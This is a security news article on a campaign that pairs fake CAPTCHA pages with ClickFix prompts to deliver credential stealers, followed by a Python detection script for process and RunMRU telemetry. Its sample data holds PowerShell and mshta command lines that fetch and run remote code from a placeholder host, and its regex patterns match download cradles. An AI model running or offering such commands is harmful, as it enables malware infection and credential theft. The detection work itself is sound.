Cybercriminals Weaponize CAPTCHA and Fake Error Prompts for Credential Theft

Combining a CAPTCHA page for apparent legitimacy with ClickFix for payload delivery lets attackers bypass conventional email security controls and steal credentials directly from victims.

CSBadmin
2 Min Read


How the Attack Works

Attackers are combining fake CAPTCHA verification pages with the ‘ClickFix’ social-engineering technique to get victims to infect their own machines. The campaign starts with phishing emails that link to a fake CAPTCHA page. When the user completes the CAPTCHA, the page shows a ‘ClickFix’ prompt telling them to copy a PowerShell command and paste it into the Windows Run dialog (Win+R). Because the victim types the command themselves, no attachment or exploit has to pass through the mail gateway. The command then downloads and executes info-stealing malware that harvests credentials from browsers and email clients.
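The execution chain above leaves two endpoint traces worth hunting for: a script host (powershell.exe, mshta.exe and the like) spawned by explorer.exe, which is what a command pasted into the Run dialog looks like in process-creation telemetry, and the pasted text itself, which Windows records under the HKCU RunMRU key. The following Python is an added example, not code from the article or from Cyber Security News; the event shape, the RunMRU values and the command lines are constructed for the example, and the indicator patterns are heuristics chosen here, not indicators published for this campaign.

```python
import re

# Process-creation events as a SIEM would present them after parsing Sysmon
# Event ID 1 or Windows Security 4688. Constructed for this example.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": 'powershell -w hidden -c "iex (irm https://example.invalid/v.ps1)"'
                ' # I am not a robot - reCAPTCHA Verification ID: 7'},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": "mshta https://example.invalid/verify.hta"},
    {"parent": r"C:\Windows\explorer.exe",
     "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe"},
    {"parent": r"C:\Program Files\Build\agent.exe",
     "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell -NoProfile -File C:\\build\\deploy.ps1"},
]

# Values as read from HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU,
# where Windows keeps Win+R history; each entry carries a trailing "\1". Constructed.
SAMPLE_RUNMRU = {
    "a": 'powershell -w hidden -c "iex (irm https://example.invalid/v.ps1)"\\1',
    "b": "calc\\1",
    "MRUList": "ab",
}

# Run-dialog children are spawned by the shell, so explorer.exe is the parent.
INTERACTIVE_LAUNCHERS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe",
                "wscript.exe", "cscript.exe"}

# Heuristics chosen for this example (assumption, not campaign IOCs): download
# cradles, in-memory evaluation, hidden windows, encoded payloads, and the fake
# "verification" comment that ClickFix lures append to make the pasted text look benign.
PATTERNS = {
    "download_cradle": re.compile(
        r"\b(irm|iwr|invoke-webrequest|invoke-restmethod|downloadstring|"
        r"downloadfile|bitsadmin|certutil)\b|mshta\s+https?:|\bcurl\s", re.I),
    "eval": re.compile(r"\biex\b|invoke-expression", re.I),
    "hidden_window": re.compile(r"-w(indowstyle)?\s*h(idden)?\b", re.I),
    "encoded": re.compile(
        r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}|frombase64string", re.I),
    "verification_lure": re.compile(r"not a robot|captcha|verification", re.I),
}


def basename(path):
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def classify_cmdline(cmdline):
    """Names of every indicator pattern that matches the command line, in PATTERNS order."""
    return [name for name, rx in PATTERNS.items() if rx.search(cmdline)]


def is_clickfix_process(event):
    """Return the matched indicators if the event looks like a pasted ClickFix command."""
    parent, image = basename(event["parent"]), basename(event["image"])
    hits = classify_cmdline(event["cmdline"])
    # Script host launched from the shell plus any payload indicator is enough.
    if parent in INTERACTIVE_LAUNCHERS and image in SCRIPT_HOSTS and hits:
        return hits
    # Outside that parent/child relationship, require two independent indicators
    # so ordinary admin automation (event 4 above) does not fire.
    return hits if len(hits) >= 2 else []


def scan_process_events(events):
    """(cmdline, indicators) for every flagged event."""
    return [(e["cmdline"], hits) for e in events if (hits := is_clickfix_process(e))]


def scan_runmru(values):
    """(value_name, command, indicators) for RunMRU entries that look like ClickFix pastes."""
    findings = []
    for name, raw in values.items():
        if name == "MRUList":          # ordering value, not a command
            continue
        command = raw[:-2] if raw.endswith("\\1") else raw
        tokens = command.split()
        first = basename(tokens[0]) if tokens else ""
        if first and not first.endswith(".exe"):
            first += ".exe"
        hits = classify_cmdline(command)
        if hits and (first in SCRIPT_HOSTS or len(hits) >= 2):
            findings.append((name, command, hits))
    return findings


if __name__ == "__main__":
    for cmdline, hits in scan_process_events(SAMPLE_EVENTS):
        print("process:", hits, cmdline)
    for name, command, hits in scan_runmru(SAMPLE_RUNMRU):
        print("RunMRU[%s]:" % name, hits, command)
```

Run against live data, the process side reads from your EDR or Sysmon pipeline and the RunMRU side from each user's hive (the key is per-user, so a triage script has to load every profile on the host). A hit on a script host under explorer.exe with a download cradle in the command line is worth an alert on its own; the verification-lure comment is corroboration, since a victim who pasted one of these commands will usually have left it in RunMRU even after the stealer has run.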

Impact and Scope

This multi-stage attack has been observed against users across multiple industries, with a particular focus on stealing credentials for financial services and enterprise login portals. The CAPTCHA step lends a false sense of legitimacy, while the ClickFix step sidesteps traditional email security filters because the malicious code never arrives as an attachment or a link the gateway can scan. No CVE is involved: the campaign relies on social engineering rather than a software vulnerability, so patching alone does not close it. The stealer variants involved target saved passwords and session tokens, so a host on which the command was run should be treated as having exposed every credential and cookie stored on it. Users are advised to verify email sources and never run commands presented by a CAPTCHA page or popup prompt, whether in the Run dialog or a terminal.

Source: Cyber Security News

CSBadmin

The latest in cybersecurity news and updates.
